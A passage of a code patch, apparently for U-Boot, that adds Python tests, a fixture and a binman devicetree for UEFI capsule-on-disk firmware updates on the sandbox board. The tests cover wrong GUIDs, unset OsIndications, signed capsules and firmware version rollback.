/helloworld.efi', + 'efidebug boot order 1', + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"']) + + if osindications is None: + u_boot_console.run_command('env set -e OsIndications') + else: + u_boot_console.run_command(f'env set -e -nv -bs -rt OsIndications ={osindications}') + + u_boot_console.run_command('env save') + +def init_content(u_boot_console, target, filename, expected): + """initialize test content + + Args: + u_boot_console -- A console connection to U-Boot. + target -- Target address to place the content. + filename -- File name of the content. + expected -- Expected string of the content. + """ + output = u_boot_console.run_command_list([ + 'sf probe 0:0', + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{filename}', + f'sf write 4000000 {target} 10', + 'sf read 5000000 100000 10', + 'md.b 5000000 10']) + assert expected in ''.join(output) + +def place_capsule_file(u_boot_console, filenames): + """place the capsule file + + Args: + u_boot_console -- A console connection to U-Boot. + filenames -- File name array of the target capsule files. + """ + for name in filenames: + u_boot_console.run_command_list([ + f'fatload host 0:1 4000000 {CAPSULE_DATA_DIR}/{name}', + f'fatwrite host 0:1 4000000 {CAPSULE_INSTALL_DIR}/{name} $filesize']) + + output = u_boot_console.run_command(f'fatls host 0:1 {CAPSULE_INSTALL_DIR}') + for name in filenames: + assert name in ''.join(output) + +def exec_manual_update(u_boot_console, disk_img, filenames, need_reboot = True): + """execute capsule update manually + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + need_reboot -- Flag indicates whether system reboot is required. + """ + # make sure that dfu_alt_info exists even persistent variables + # are not available. + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info ' + '"sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + + # need to run uefi command to initiate capsule handling + u_boot_console.run_command( + 'env print -e Capsule0000', wait_for_reboot = need_reboot) + +def check_file_removed(u_boot_console, disk_img, filenames): + """check files are removed + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + """ + output = u_boot_console.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name not in ''.join(output) + +def check_file_exist(u_boot_console, disk_img, filenames): + """check files exist + + Args: + u_boot_console -- A console connection to U-Boot. + disk_img -- A path to disk image to be used for testing. + filenames -- File name array of the target capsule files. + """ + output = u_boot_console.run_command_list([ + f'host bind 0 {disk_img}', + f'fatls host 0:1 {CAPSULE_INSTALL_DIR}']) + for name in filenames: + assert name in ''.join(output) + +def verify_content(u_boot_console, target, expected): + """verify the content + + Args: + u_boot_console -- A console connection to U-Boot. + target -- Target address to verify. + expected -- Expected string of the content. + """ + output = u_boot_console.run_command_list([ + 'sf probe 0:0', + f'sf read 4000000 {target} 10', + 'md.b 4000000 10']) + assert expected in ''.join(output) + +def do_reboot_dtb_specified(u_boot_config, u_boot_console, dtb_filename): + """do reboot with specified DTB + + Args: + u_boot_config -- U-boot configuration. + u_boot_console -- A console connection to U-Boot. + dtb_filename -- DTB file name. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + u_boot_console.config.dtb = mnt_point + CAPSULE_DATA_DIR \ + + f'/{dtb_filename}' + u_boot_console.restart_uboot() diff --git a/test/py/tests/test_efi_capsule/capsule_defs.py b/test/py/tests/test_efi_capsule/capsule_defs.py new file mode 100644 index 00000000000..3cc695e29b5 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_defs.py @@ -0,0 +1,12 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Directoreis used for authentication and capsule tests.""" + +# Directories +CAPSULE_DATA_DIR = '/EFI/CapsuleTestData' +CAPSULE_INSTALL_DIR = '/EFI/UpdateCapsule' + +# v1.5.1 or earlier of efitools has a bug in sha256 calculation, and +# you need build a newer version on your own. +# The path must terminate with '/' if it is not null. +EFITOOLS_PATH = '' diff --git a/test/py/tests/test_efi_capsule/capsule_gen_binman.dts b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts new file mode 100644 index 00000000000..e8a18585092 --- /dev/null +++ b/test/py/tests/test_efi_capsule/capsule_gen_binman.dts @@ -0,0 +1,321 @@ +// SPDX-License-Identifier: GPL-2.0+ +/* + * Devicetree for capsule generation through binman + */ + +/dts-v1/; + +#include <sandbox_efi_capsule.h> + +/ { + binman: binman { + multiple-images; + }; +}; + +&binman { + itb { + filename = UBOOT_FIT_IMAGE; + + fit { + description = "Automatic U-Boot environment update"; + #address-cells = <2>; + + images { + u-boot-bin { + description = "U-Boot binary on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; + load = <0>; + text { + text = "u-boot:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + u-boot-env { + description = "U-Boot environment on SPI Flash"; + compression = "none"; + type = "firmware"; + arch = "sandbox"; + load = <0>; + text { + text = "u-boot-env:New"; + }; + + hash-1 { + algo = "sha1"; + }; + }; + }; + }; + }; + + capsule1 { + filename = "Test01"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule2 { + filename = "Test02"; + efi-capsule { + image-index = <0x2>; + image-guid = SANDBOX_UBOOT_ENV_IMAGE_GUID; + + text { + text = "u-boot-env:New"; + }; + }; + }; + + capsule3 { + filename = "Test03"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_INCORRECT_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule4 { + filename = "Test04"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule5 { + filename = "Test05"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_INCORRECT_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule6 { + filename = "Test101"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule7 { + filename = "Test102"; + efi-capsule { + image-index = <0x2>; + fw-version = <0xa>; + image-guid = SANDBOX_UBOOT_ENV_IMAGE_GUID; + + text { + text = "u-boot-env:New"; + }; + }; + }; + + capsule8 { + filename = "Test103"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule9 { + filename = "Test104"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule10 { + filename = "Test105"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule11 { + filename = "Test11"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule12 { + filename = "Test12"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_INVAL_KEY; + public-key-cert = CAPSULE_INVAL_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule13 { + filename = "Test13"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule14 { + filename = "Test14"; + efi-capsule { + image-index = <0x1>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_INVAL_KEY; + public-key-cert = CAPSULE_INVAL_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule15 { + filename = "Test111"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule16 { + filename = "Test112"; + efi-capsule { + image-index = <0x2>; + fw-version = <0xa>; + image-guid = SANDBOX_UBOOT_ENV_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot-env:New"; + }; + }; + }; + + capsule17 { + filename = "Test113"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_UBOOT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + text { + text = "u-boot:New"; + }; + }; + }; + + capsule18 { + filename = "Test114"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x5>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; + + capsule19 { + filename = "Test115"; + efi-capsule { + image-index = <0x1>; + fw-version = <0x2>; + image-guid = SANDBOX_FIT_IMAGE_GUID; + private-key = CAPSULE_PRIV_KEY; + public-key-cert = CAPSULE_PUB_KEY; + monotonic-count = <0x1>; + + blob { + filename = UBOOT_FIT_IMAGE; + }; + }; + }; +}; diff --git a/test/py/tests/test_efi_capsule/conftest.py b/test/py/tests/test_efi_capsule/conftest.py new file mode 100644 index 00000000000..dd41da9284e --- /dev/null +++ b/test/py/tests/test_efi_capsule/conftest.py @@ -0,0 +1,104 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""Fixture for UEFI capsule test.""" + +import os + +from subprocess import call, check_call, CalledProcessError +import pytest +from capsule_defs import CAPSULE_DATA_DIR, CAPSULE_INSTALL_DIR, EFITOOLS_PATH + +@pytest.fixture(scope='session') +def efi_capsule_data(request, u_boot_config): + """Set up a file system and return path to image. + + The function sets up a file system to be used in UEFI capsule and + authentication test and returns a path to disk image to be used + for testing. + + request -- Pytest request object. + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_capsule' + data_dir = mnt_point + CAPSULE_DATA_DIR + install_dir = mnt_point + CAPSULE_INSTALL_DIR + image_path = u_boot_config.persistent_data_dir + '/test_efi_capsule.img' + + try: + # Create a target device + check_call('dd if=/dev/zero of=./spi.bin bs=1MiB count=16', shell=True) + + check_call('rm -rf %s' % mnt_point, shell=True) + check_call('mkdir -p %s' % data_dir, shell=True) + check_call('mkdir -p %s' % install_dir, shell=True) + + capsule_auth_enabled = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + key_dir = u_boot_config.source_dir + '/board/sandbox' + if capsule_auth_enabled: + # Get the keys from the board directory + check_call('cp %s/capsule_priv_key_good.key %s/SIGNER.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_good.crt %s/SIGNER.crt' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_esl_good.esl %s/SIGNER.esl' + % (key_dir, data_dir), shell=True) + + check_call('cp %s/capsule_priv_key_bad.key %s/SIGNER2.key' + % (key_dir, data_dir), shell=True) + check_call('cp %s/capsule_pub_key_bad.crt %s/SIGNER2.crt' + % (key_dir, data_dir), shell=True) + + # Update dtb to add the version information + check_call('cd %s; ' + 'cp %s/test/py/tests/test_efi_capsule/version.dts .' + % (data_dir, u_boot_config.source_dir), shell=True) + + if capsule_auth_enabled: + check_call('cd %s; ' + 'cp %s/arch/sandbox/dts/test.dtb test_sig.dtb' + % (data_dir, u_boot_config.build_dir), shell=True) + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dts; ' + 'fdtoverlay -i test_sig.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir), shell=True) + else: + check_call('cd %s; ' + 'dtc -@ -I dts -O dtb -o version.dtbo version.dts; ' + 'fdtoverlay -i %s/arch/sandbox/dts/test.dtb ' + '-o test_ver.dtb version.dtbo' + % (data_dir, u_boot_config.build_dir), shell=True) + + # two regions: one for u-boot.bin and the other for u-boot.env + check_call('cd %s; echo -n u-boot:Old > u-boot.bin.old; echo -n u-boot:New > u-boot.bin.new; echo -n u-boot-env:Old > u-boot.env.old; echo -n u-boot-env:New > u-boot.env.new' % data_dir, + shell=True) + + pythonpath = os.environ.get('PYTHONPATH', '') + os.environ['PYTHONPATH'] = pythonpath + ':' + '%s/scripts/dtc/pylibfdt' % u_boot_config.build_dir + check_call('cd %s; ' + 'cc -E -I %s/include -x assembler-with-cpp -o capsule_gen_tmp.dts %s/test/py/tests/test_efi_capsule/capsule_gen_binman.dts; ' + 'dtc -I dts -O dtb capsule_gen_tmp.dts -o capsule_binman.dtb;' + % (data_dir, u_boot_config.source_dir, u_boot_config.source_dir), shell=True) + check_call('cd %s; ' + './tools/binman/binman --toolpath %s/tools build -u -d %s/capsule_binman.dtb -O %s -m --allow-missing -I %s -I ./board/sandbox -I ./arch/sandbox/dts' + % (u_boot_config.source_dir, u_boot_config.build_dir, data_dir, data_dir, data_dir), shell=True) + os.environ['PYTHONPATH'] = pythonpath + + # Create a disk image with EFI system partition + check_call('virt-make-fs --partition=gpt --size=+1M --type=vfat %s %s' % + (mnt_point, image_path), shell=True) + check_call('sgdisk %s -A 1:set:0 -t 1:C12A7328-F81F-11D2-BA4B-00A0C93EC93B' % + image_path, shell=True) + + except CalledProcessError as exception: + pytest.skip('Setup failed: %s' % exception.cmd) + return + else: + yield image_path + finally: + call('rm -rf %s' % mnt_point, shell=True) + call('rm -f %s' % image_path, shell=True) + call('rm -f ./spi.bin', shell=True) diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py new file mode 100644 index 00000000000..11bcdc2bb29 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_fit.py @@ -0,0 +1,183 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for FIT images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.buildconfigspec('efi_capsule_firmware_fit') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareFit(): + """Test capsule-on-disk firmware update for FIT images + """ + + def test_efi_capsule_fw1( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. + u_boot_console.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test05'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + # reboot + u_boot_console.restart_uboot(expect_reset = capsule_early) + + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + disk_img = efi_capsule_data + capsule_files = ['Test04'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + u_boot_console.restart_uboot(expect_reset = capsule_early) + + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + expected = 'u-boot:Old' if capsule_auth else 'u-boot:New' + verify_content(u_boot_console, '100000', expected) + + expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New' + verify_content(u_boot_console, '150000', expected) + + def test_efi_capsule_fw3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test104'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + if capsule_auth: + # capsule authentication failed + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + else: + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '3673B45D-6A7C-46F3-9E60-ADABB03F7937' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(u_boot_console, '100000', 'u-boot:New') + verify_content(u_boot_console, '150000', 'u-boot-env:New') + + def test_efi_capsule_fw4( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 4 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + but fw_version is lower than lowest_supported_version + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test105'] + with u_boot_console.log.section('Test Case 4-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py new file mode 100644 index 00000000000..a5b5c8a3853 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_raw.py @@ -0,0 +1,229 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +""" U-Boot UEFI: Firmware Update Test +This test verifies capsule-on-disk firmware update for raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + check_file_exist, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_on_disk') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareRaw: + """ Tests verifying capsule-on-disk firmware update for raw images + """ + + def test_efi_capsule_fw1( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 1 + Update U-Boot and U-Boot environment on SPI Flash + but with an incorrect GUID value in the capsule + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + + # other tests might have run and the + # system might not be in a clean state. + # Restart before starting the tests. + u_boot_console.restart_uboot() + + disk_img = efi_capsule_data + capsule_files = ['Test03'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + u_boot_console.restart_uboot() + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 2 + Update U-Boot and U-Boot environment on SPI Flash but with OsIndications unset + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, None) + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + u_boot_console.restart_uboot() + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files, False) + + check_file_exist(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + + def test_efi_capsule_fw3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 3 + Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test01', 'Test02'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + + # reboot + u_boot_console.restart_uboot(expect_reset = capsule_early) + + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '5A7021F5-FEF2-48B4-AABA-832E777418C0' in ''.join(output) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '09D7CF52-0720-4710-91D1-08469B7FE9C8' in ''.join(output) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + expected = 'u-boot:Old' if capsule_auth else 'u-boot:New' + verify_content(u_boot_console, '100000', expected) + + expected = 'u-boot-env:Old' if capsule_auth else 'u-boot-env:New' + verify_content(u_boot_console, '150000', expected) + + def test_efi_capsule_fw4( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 4 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + 0x100000-0x150000: U-Boot binary (but dummy) + 0x150000-0x200000: U-Boot environment (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test101', 'Test102'] + with u_boot_console.log.section('Test Case 4-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + init_content(u_boot_console, '150000', 'u-boot.env.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + capsule_auth = u_boot_config.buildconfig.get( + 'config_efi_capsule_authenticate') + with u_boot_console.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + # make sure the dfu_alt_info exists because it is required for making ESRT. + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + if capsule_auth: + # capsule authentication failed + verify_content(u_boot_console, '100000', 'u-boot:Old') + verify_content(u_boot_console, '150000', 'u-boot-env:Old') + else: + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '09D7CF52-0720-4710-91D1-08469B7FE9C8' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '5A7021F5-FEF2-48B4-AABA-832E777418C0' in ''.join(output) + assert 'ESRT: fw_version=10' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output) + + verify_content(u_boot_console, '100000', 'u-boot:New') + verify_content(u_boot_console, '150000', 'u-boot-env:New') + + def test_efi_capsule_fw5( + self, u_boot_config, u_boot_console, efi_capsule_data): + """ Test Case 5 + Update U-Boot on SPI Flash, raw image format with fw_version and lowest_supported_version + but fw_version is lower than lowest_supported_version + No update should happen + 0x100000-0x150000: U-Boot binary (but dummy) + """ + disk_img = efi_capsule_data + capsule_files = ['Test103'] + with u_boot_console.log.section('Test Case 5-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + # reboot + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py new file mode 100644 index 00000000000..44a58baa310 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_fit.py @@ -0,0 +1,193 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Linaro Limited +# Copyright (c) 2022, 